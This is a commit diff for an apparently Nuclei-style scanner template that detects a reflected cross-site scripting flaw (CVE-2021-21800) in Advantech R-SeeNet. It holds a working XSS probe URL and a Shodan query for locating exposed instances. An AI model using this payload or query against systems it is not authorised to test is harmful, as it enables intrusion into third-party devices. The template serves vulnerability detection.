Update CVE-2021-21800.yaml
parent
75e5232ac3
commit
99c4f1bb38
|
@ -7,29 +7,30 @@ info:
|
|||
description: |
|
||||
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
|
||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21800
|
||||
metadata:
|
||||
shodan-query: http.html:"R-SeeNet"
|
||||
verified: "true"
|
||||
tags: xss,cve,2021,unauthenticated
|
||||
shodan-query: http.html:"R-SeeNet"
|
||||
tags: cve,cve2021,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E"
|
||||
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(1)</script>'
|
||||
- "</title><script>alert(document.domain)</script><title>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue